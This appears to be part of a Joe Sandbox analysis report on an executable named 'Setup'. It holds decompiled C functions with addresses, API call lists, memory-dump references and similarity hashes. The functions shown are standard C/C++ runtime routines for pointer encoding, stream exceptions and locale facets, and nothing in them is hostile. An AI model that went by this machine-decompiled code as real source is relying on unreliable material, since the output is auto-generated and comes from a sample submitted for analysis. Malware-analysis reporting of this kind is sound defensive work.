                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ee9befc5d412d6b37adc3eb8adee5c5394e34c7a3deb8f203237b3e485ba1a00
                                                                                                                                                                                              • Instruction ID: 66d667e5a9dc5ae6ef4bd82287013ccb886959e2c26a545fcf9998a425785fd6
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee9befc5d412d6b37adc3eb8adee5c5394e34c7a3deb8f203237b3e485ba1a00
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51FEB8A05B01CF9358CF59F9A89217BE1F798311391823AD81983776E730A892CF4C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040BD0F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                              			E0040BD0F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x428760);
				E0040D194(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040DAD5(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x426088;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x454f88;
				E0040C69C(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0040BDE4();
				E0040C69C(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x454d98; // 0x1f310f8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00408E95( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040D1D9(E0040BDED());
			}








                                                                                                                                                                                              0x0040bd0f
                                                                                                                                                                                              0x0040bd0f
                                                                                                                                                                                              0x0040bd11
                                                                                                                                                                                              0x0040bd16
                                                                                                                                                                                              0x0040bd1b
                                                                                                                                                                                              0x0040bd21
                                                                                                                                                                                              0x0040bd29
                                                                                                                                                                                              0x0040bd2c
                                                                                                                                                                                              0x0040bd31
                                                                                                                                                                                              0x0040bd32
                                                                                                                                                                                              0x0040bd35
                                                                                                                                                                                              0x0040bd38
                                                                                                                                                                                              0x0040bd42
                                                                                                                                                                                              0x0040bd47
                                                                                                                                                                                              0x0040bd4f
                                                                                                                                                                                              0x0040bd57
                                                                                                                                                                                              0x0040bd67
                                                                                                                                                                                              0x0040bd67
                                                                                                                                                                                              0x0040bd6d
                                                                                                                                                                                              0x0040bd70
                                                                                                                                                                                              0x0040bd77
                                                                                                                                                                                              0x0040bd7e
                                                                                                                                                                                              0x0040bd87
                                                                                                                                                                                              0x0040bd8d
                                                                                                                                                                                              0x0040bd94
                                                                                                                                                                                              0x0040bd9a
                                                                                                                                                                                              0x0040bda1
                                                                                                                                                                                              0x0040bda8
                                                                                                                                                                                              0x0040bdae
                                                                                                                                                                                              0x0040bdb1
                                                                                                                                                                                              0x0040bdb4
                                                                                                                                                                                              0x0040bdb9
                                                                                                                                                                                              0x0040bdbb
                                                                                                                                                                                              0x0040bdc0
                                                                                                                                                                                              0x0040bdc0
                                                                                                                                                                                              0x0040bdc6
                                                                                                                                                                                              0x0040bdcc
                                                                                                                                                                                              0x0040bddd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00428760,0000000C,0040BE4A,00000000,00000000,?,?,0040A987,00405676,?,0040121A,?,?), ref: 0040BD21
                                                                                                                                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 0040BD2C
                                                                                                                                                                                                • Part of subcall function 0040DAD5: Sleep.KERNEL32(000003E8,00000000,?,0040BC72,KERNEL32.DLL,?,0040BCBE,?,?,0040A987,00405676,?,0040121A,?,?), ref: 0040DAE1
                                                                                                                                                                                                • Part of subcall function 0040DAD5: GetModuleHandleW.KERNEL32(00000010,?,0040BC72,KERNEL32.DLL,?,0040BCBE,?,?,0040A987,00405676,?,0040121A,?,?), ref: 0040DAEA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040BD55
                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040BD65
                                                                                                                                                                                              • __lock.LIBCMT ref: 0040BD87
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00454F88), ref: 0040BD94
                                                                                                                                                                                              • __lock.LIBCMT ref: 0040BDA8
                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 0040BDC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                              • API String ID: 1028249917-2843748187
                                                                                                                                                                                              • Opcode ID: 092182e1cb480942161b27bf928a04b76121f30817ef10cf0e4156ab18411131
                                                                                                                                                                                              • Instruction ID: 558d895ca9720367235a936595c63a6f2dc7b3728dda36e2029cf8f968322e1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 092182e1cb480942161b27bf928a04b76121f30817ef10cf0e4156ab18411131
                                                                                                                                                                                              • Instruction Fuzzy Hash: F5116071A40701DED720EF66D801B5ABBF4EF44328F50452FE499A62E1CB789945CF5C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041E450 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0041E450(intOrPtr __ecx, signed int _a4, signed char _a8) {
				char _v44;
				char _v72;
				char _v112;
				char _v140;
				char _v180;
				char _v208;
				intOrPtr _v212;
				intOrPtr _t35;

				_v212 = __ecx;
				 *(_v212 + 8) = _a4 & 0x00000017;
				_t35 = _v212;
				if(( *(_v212 + 8) &  *(_t35 + 0xc)) != 0) {
					if((_a8 & 0x000000ff) == 0) {
						if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000004) == 0) {
							if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000002) == 0) {
								E00401030( &_v208, "ios_base::eofbit set");
								E0041E580( &_v180,  &_v208);
								E004052CB( &_v180, 0x427cd8);
								return E00401070( &_v208);
							}
							E00401030( &_v140, "ios_base::failbit set");
							E0041E580( &_v112,  &_v140);
							E004052CB( &_v112, 0x427cd8);
							return E00401070( &_v140);
						}
						E00401030( &_v72, "ios_base::badbit set");
						E0041E580( &_v44,  &_v72);
						E004052CB( &_v44, 0x427cd8);
						return E00401070( &_v72);
					}
					return E004052CB(0, 0);
				}
				return _t35;
			}











                                                                                                                                                                                              0x0041e459
                                                                                                                                                                                              0x0041e46b
                                                                                                                                                                                              0x0041e474
                                                                                                                                                                                              0x0041e480
                                                                                                                                                                                              0x0041e48d
                                                                                                                                                                                              0x0041e4b2
                                                                                                                                                                                              0x0041e4fd
                                                                                                                                                                                              0x0041e544
                                                                                                                                                                                              0x0041e556
                                                                                                                                                                                              0x0041e567
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e572
                                                                                                                                                                                              0x0041e50a
                                                                                                                                                                                              0x0041e519
                                                                                                                                                                                              0x0041e527
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e532
                                                                                                                                                                                              0x0041e4bc
                                                                                                                                                                                              0x0041e4c8
                                                                                                                                                                                              0x0041e4d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e4de
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041e493
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041E493
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                              • API String ID: 2005118841-1866435925
                                                                                                                                                                                              • Opcode ID: 80604941730659b7d57f1aa9b78bce4cf1d245c9fa2869a018fddc1dae9d9c64
                                                                                                                                                                                              • Instruction ID: 9d4eabd81ce654f1d9dff7325963b03edc6aed22e5757f0b5c8d46ff40b0f0f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 80604941730659b7d57f1aa9b78bce4cf1d245c9fa2869a018fddc1dae9d9c64
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6316D349102189BC718EB92DC92FEDB335BF44304F94829BE40937195EB386E85CF68
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00403724 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E00403724(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t39 = __edx;
				_push(0x14);
				E004070C4(E004179B6, __ebx, __edi, __esi);
				E00403A0C(_t44 - 0x14, 0);
				_t43 =  *0x455b5c; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E0041EF40(0x455bf0);
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E0041EFB0( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E004035A2(__ebx, _t32, _t39, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00405469(_t44 - 0x20, "bad cast");
							E004052CB(_t44 - 0x20, 0x427f38);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x455b5c =  *((intOrPtr*)(_t44 - 0x10));
						E0041DE30( *((intOrPtr*)(_t44 - 0x10)));
						E00403CD1(_t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00403A34(_t44 - 0x14);
				return E00407163(_t41);
			}









                                                                                                                                                                                              0x00403724
                                                                                                                                                                                              0x00403724
                                                                                                                                                                                              0x0040372b
                                                                                                                                                                                              0x00403735
                                                                                                                                                                                              0x0040373a
                                                                                                                                                                                              0x00403740
                                                                                                                                                                                              0x00403749
                                                                                                                                                                                              0x0040374c
                                                                                                                                                                                              0x00403751
                                                                                                                                                                                              0x00403755
                                                                                                                                                                                              0x0040375a
                                                                                                                                                                                              0x0040375e
                                                                                                                                                                                              0x00403762
                                                                                                                                                                                              0x00403768
                                                                                                                                                                                              0x0040376e
                                                                                                                                                                                              0x0040376f
                                                                                                                                                                                              0x00403776
                                                                                                                                                                                              0x00403779
                                                                                                                                                                                              0x00403783
                                                                                                                                                                                              0x00403791
                                                                                                                                                                                              0x00403791
                                                                                                                                                                                              0x00403796
                                                                                                                                                                                              0x0040379b
                                                                                                                                                                                              0x004037a1
                                                                                                                                                                                              0x004037a7
                                                                                                                                                                                              0x00403764
                                                                                                                                                                                              0x00403764
                                                                                                                                                                                              0x00403764
                                                                                                                                                                                              0x00403762
                                                                                                                                                                                              0x004037ad
                                                                                                                                                                                              0x004037b4
                                                                                                                                                                                              0x004037c0

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0040372B
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403735
                                                                                                                                                                                              • int.LIBCPMTD ref: 0040374C
                                                                                                                                                                                                • Part of subcall function 0041EF40: std::_Lockit::_Lockit.LIBCPMT ref: 0041EF56
                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMTD ref: 00403755
                                                                                                                                                                                              • codecvt.LIBCPMT ref: 0040376F
                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00403783
                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00403791
                                                                                                                                                                                              • std::locale::facet::_Incref.LIBCPMTD ref: 004037A1
                                                                                                                                                                                              • std::locale::facet::facet_Register.LIBCPMT ref: 004037A7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                                                              • String ID: bad cast
                                                                                                                                                                                              • API String ID: 577375395-3145022300
                                                                                                                                                                                              • Opcode ID: 4cdada124daaf0f96ab34362adcd8a2420b8cef538f9962861ca4d6029b97d9b
                                                                                                                                                                                              • Instruction ID: 4ed6d4d65db23e1cf72f5924d4e01c9d9f23652d2e779490a938459f824ebdf1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cdada124daaf0f96ab34362adcd8a2420b8cef538f9962861ca4d6029b97d9b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5001C271900614A6CB04EBA1C852ABEBB29AF40329F50452FF4107B2D1DB3CAA028B9D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041FEE0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0041FEE0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403A0C( &_v16, 0);
				_t27 =  *0x455b44; // 0x0
				_v20 = _t27;
				_v12 = E0041EF40(0x455b54);
				_v8 = E0041EFB0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E004200A0(__ebx,  &_v20, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x455b44 = _v20;
							_v24 = _v20;
							E0041DE30(_v24);
							E0041EF90(_v24);
						} else {
							_t13 =  &_v36; // 0x41e260
							E00405469(_t13, "bad cast");
							_t14 =  &_v36; // 0x41e260
							E004052CB(_t14, 0x427f38);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403A34( &_v16);
				return _v40;
			}












                                                                                                                                                                                              0x0041feeb
                                                                                                                                                                                              0x0041fef0
                                                                                                                                                                                              0x0041fef5
                                                                                                                                                                                              0x0041ff02
                                                                                                                                                                                              0x0041ff11
                                                                                                                                                                                              0x0041ff18
                                                                                                                                                                                              0x0041ff20
                                                                                                                                                                                              0x0041ff3d
                                                                                                                                                                                              0x0041ff5f
                                                                                                                                                                                              0x0041ff65
                                                                                                                                                                                              0x0041ff6e
                                                                                                                                                                                              0x0041ff74
                                                                                                                                                                                              0x0041ff7c
                                                                                                                                                                                              0x0041ff3f
                                                                                                                                                                                              0x0041ff44
                                                                                                                                                                                              0x0041ff47
                                                                                                                                                                                              0x0041ff51
                                                                                                                                                                                              0x0041ff55
                                                                                                                                                                                              0x0041ff55
                                                                                                                                                                                              0x0041ff22
                                                                                                                                                                                              0x0041ff25
                                                                                                                                                                                              0x0041ff25
                                                                                                                                                                                              0x0041ff20
                                                                                                                                                                                              0x0041ff84
                                                                                                                                                                                              0x0041ff8a
                                                                                                                                                                                              0x0041ff95

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0041FEEB
                                                                                                                                                                                              • int.LIBCPMTD ref: 0041FEFD
                                                                                                                                                                                                • Part of subcall function 0041EF40: std::_Lockit::_Lockit.LIBCPMT ref: 0041EF56
                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMTD ref: 0041FF0C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                              • String ID: T[E$`A$bad cast
                                                                                                                                                                                              • API String ID: 3702371321-3070076913
                                                                                                                                                                                              • Opcode ID: 8e1911a69f38a0924f3d4b55853d3044f3cb43068e664823713b1a18f758ad15
                                                                                                                                                                                              • Instruction ID: a0902a6226d66c5a51f220f434e4a11e107f10815e3163f1541a7398b0a4f644
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e1911a69f38a0924f3d4b55853d3044f3cb43068e664823713b1a18f758ad15
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6216F74E00208DBCB04DFA5D951AEEB7B0BF48304F10466FE90577281DB785E46CB99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00421850 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00421850(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403A0C( &_v16, 0);
				_t27 =  *0x455b48; // 0x0
				_v20 = _t27;
				_v12 = E0041EF40(0x455b50);
				_v8 = E0041EFB0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E00421910(__ebx,  &_v20, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x455b48 = _v20;
							_v24 = _v20;
							E0041DE30(_v24);
							E0041EF90(_v24);
						} else {
							E00405469( &_v36, "bad cast");
							E004052CB( &_v36, 0x427f38);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403A34( &_v16);
				return _v40;
			}












                                                                                                                                                                                              0x0042185b
                                                                                                                                                                                              0x00421860
                                                                                                                                                                                              0x00421865
                                                                                                                                                                                              0x00421872
                                                                                                                                                                                              0x00421881
                                                                                                                                                                                              0x00421888
                                                                                                                                                                                              0x00421890
                                                                                                                                                                                              0x004218ad
                                                                                                                                                                                              0x004218cf
                                                                                                                                                                                              0x004218d5
                                                                                                                                                                                              0x004218de
                                                                                                                                                                                              0x004218e4
                                                                                                                                                                                              0x004218ec
                                                                                                                                                                                              0x004218af
                                                                                                                                                                                              0x004218b7
                                                                                                                                                                                              0x004218c5
                                                                                                                                                                                              0x004218c5
                                                                                                                                                                                              0x00421892
                                                                                                                                                                                              0x00421895
                                                                                                                                                                                              0x00421895
                                                                                                                                                                                              0x00421890
                                                                                                                                                                                              0x004218f4
                                                                                                                                                                                              0x004218fa
                                                                                                                                                                                              0x00421905

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0042185B
                                                                                                                                                                                              • int.LIBCPMTD ref: 0042186D
                                                                                                                                                                                                • Part of subcall function 0041EF40: std::_Lockit::_Lockit.LIBCPMT ref: 0041EF56
                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMTD ref: 0042187C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                              • String ID: P[E$bad cast
                                                                                                                                                                                              • API String ID: 3702371321-1709718909
                                                                                                                                                                                              • Opcode ID: 38d04b98e565438fb16a88f8774e19b8b849166b64f3f4d0fe140d86bfd48443
                                                                                                                                                                                              • Instruction ID: 6f98c9217f793e76ad3ee3af53bddb27eaa0cade392944ae79f4533cf74556e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 38d04b98e565438fb16a88f8774e19b8b849166b64f3f4d0fe140d86bfd48443
                                                                                                                                                                                              • Instruction Fuzzy Hash: 16213B74E00218EBCB04EFA5D991AFEB7B0BF58304F60456EF90177291DB786A41CB99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041FE20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0041FE20(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403A0C( &_v16, 0);
				_t27 =  *0x455b40; // 0x0
				_v20 = _t27;
				_v12 = E0041EF40(0x455b4c);
				_v8 = E0041EFB0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E0041FFD0(__ebx,  &_v20, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x455b40 = _v20;
							_v24 = _v20;
							E0041DE30(_v24);
							E0041EF90(_v24);
						} else {
							E00405469( &_v36, "bad cast");
							E004052CB( &_v36, 0x427f38);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403A34( &_v16);
				return _v40;
			}












                                                                                                                                                                                              0x0041fe2b
                                                                                                                                                                                              0x0041fe30
                                                                                                                                                                                              0x0041fe35
                                                                                                                                                                                              0x0041fe42
                                                                                                                                                                                              0x0041fe51
                                                                                                                                                                                              0x0041fe58
                                                                                                                                                                                              0x0041fe60
                                                                                                                                                                                              0x0041fe7d
                                                                                                                                                                                              0x0041fe9f
                                                                                                                                                                                              0x0041fea5
                                                                                                                                                                                              0x0041feae
                                                                                                                                                                                              0x0041feb4
                                                                                                                                                                                              0x0041febc
                                                                                                                                                                                              0x0041fe7f
                                                                                                                                                                                              0x0041fe87
                                                                                                                                                                                              0x0041fe95
                                                                                                                                                                                              0x0041fe95
                                                                                                                                                                                              0x0041fe62
                                                                                                                                                                                              0x0041fe65
                                                                                                                                                                                              0x0041fe65
                                                                                                                                                                                              0x0041fe60
                                                                                                                                                                                              0x0041fec4
                                                                                                                                                                                              0x0041feca
                                                                                                                                                                                              0x0041fed5

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0041FE2B
                                                                                                                                                                                              • int.LIBCPMTD ref: 0041FE3D
                                                                                                                                                                                                • Part of subcall function 0041EF40: std::_Lockit::_Lockit.LIBCPMT ref: 0041EF56
                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMTD ref: 0041FE4C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
